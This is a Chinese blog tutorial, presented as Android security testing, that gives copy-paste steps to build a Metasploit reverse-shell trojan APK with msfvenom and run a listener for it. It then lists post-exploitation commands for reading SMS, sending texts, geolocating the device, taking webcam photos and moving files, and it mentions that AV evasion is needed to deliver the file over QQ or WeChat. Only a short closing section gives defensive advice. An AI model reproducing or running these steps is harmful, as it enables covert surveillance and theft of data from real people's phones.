在信息时代,人们消遣的方式有很多,手机就是其中之一。但是手机同时也是我们的危险源之一,很多人喜欢把自己的证件、身份信息保存到手机里面,今天主要给大家带来一篇关于Android安全的文章,主要以测试、预防为主,让大家了解到手机的‘凶险’之处。

设备简介:

第一:控制端:Linux-Metasploit(10.100.xxx.xxx)
第二:被控端:Android(雷电模拟器)

下面步入正题

一、前期准备

1.使用root权限生成一个木马程序

查询本机ip

ifconfig

LHOST=xxx.xxx.xxx.xxx中的xxx.xxx.xxx.xxx替换成自己的ip,后面的LPORT=5555是自己设置的端口号,记得设置完记住,后期需要使用,123.apk是木马文件的名称。你可以随机改名(中文也可以)前提带后缀 .apk 是安卓运用程序的后缀,千万不要错了!!

msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=5555 R >123.apk

在这里插入图片描述

2.文件位置

在输入上面的命令后,会在root文件夹下生成一个123.apk的文件,如下图所示:
在这里插入图片描述
在这里插入图片描述

二、提权过程

1.发送文件到目标设备

可以使用QQ、微信、U盘等方式,QQ的安装方法我在前几期文章也写了,但是如果使用QQ则会被杀毒,微信则提示空文件,此时需要用到免杀、捆绑技术,这个我下一期或者下下期会出一则文章。这里我们使用U盘直接拷贝过去模拟器进行测试

传送链接: Linux qq如何安装?
在这里插入图片描述

2.开始提权

打开msfvenom,root权限下输入:

msfconsole

每一次打开的图片都不一样
在这里插入图片描述
然后在 msf6> 开始输入指令,根据以下复制粘贴也可以

1.选择使用模块,这里使用handler
use exploit/multi/handler 
2. 选择攻击模块
set payload android/meterpreter/reverse_tcp
3.攻击机本地IP以及端口(记得替换IP和端口,都是自己在刚才生成木马程序时设置的
set LhOST xxx.xxx.xxx.xxx
set lport 5555
4.运行刚刚所设置的配置
run

在这里插入图片描述

当目标及点击木马程序后出现meterpreter代表提权成功
在这里插入图片描述

三、开始监听

1.查看目标机系统信息
sysinfo

在这里插入图片描述
验证目标机信息是否正确

 目标及信息

2.功能演示

首先输入“ ?”查看可用功能

在这里插入图片描述

在这里插入图片描述

下面我将用app-listapp_run 做一个简单的演示
查看目标机所有app以及信息
在这里插入图片描述

* 对照下表可以看到如果要打开某app的使用方法是app_run,具体的格式在图中“方法”处可以见。

方法中的命令格式是:app_run +查看本机软件信息的Package
在这里插入图片描述

列如以下指令中‘com.android.browser’是Android浏览器的系统程序的意思

app_run com.android.browser

在这里插入图片描述

同理打开QQ或者其他软件
在这里插入图片描述

四、常用命令

1.实时查看靶机的信息

dump_sms

2.检查是否root

check_root

3.向目标机发送短信(182123是电话号码,可以随便替换)

send_sms -d 182123 -t "hello"

在这里插入图片描述
4.目标定位

wlan_geolocate

5.拍摄照片

webcam_snap

6.上传下载

上传
upload /文件  /目标地址 
下载
download 文件

总结

本文简单介绍了使用metasploit对安卓手机渗透测试提权,同时也说明,信息安全不可忽视。保护自己的隐私我们可以:
1.不乱下载不明app
2.不要随便在手机上root
3.定时定期备份信息,并且清理信息,同时也不要将铭感信息保存在手机、电脑

Logo

技术共进,成长同行——讯飞AI开发者社区

更多推荐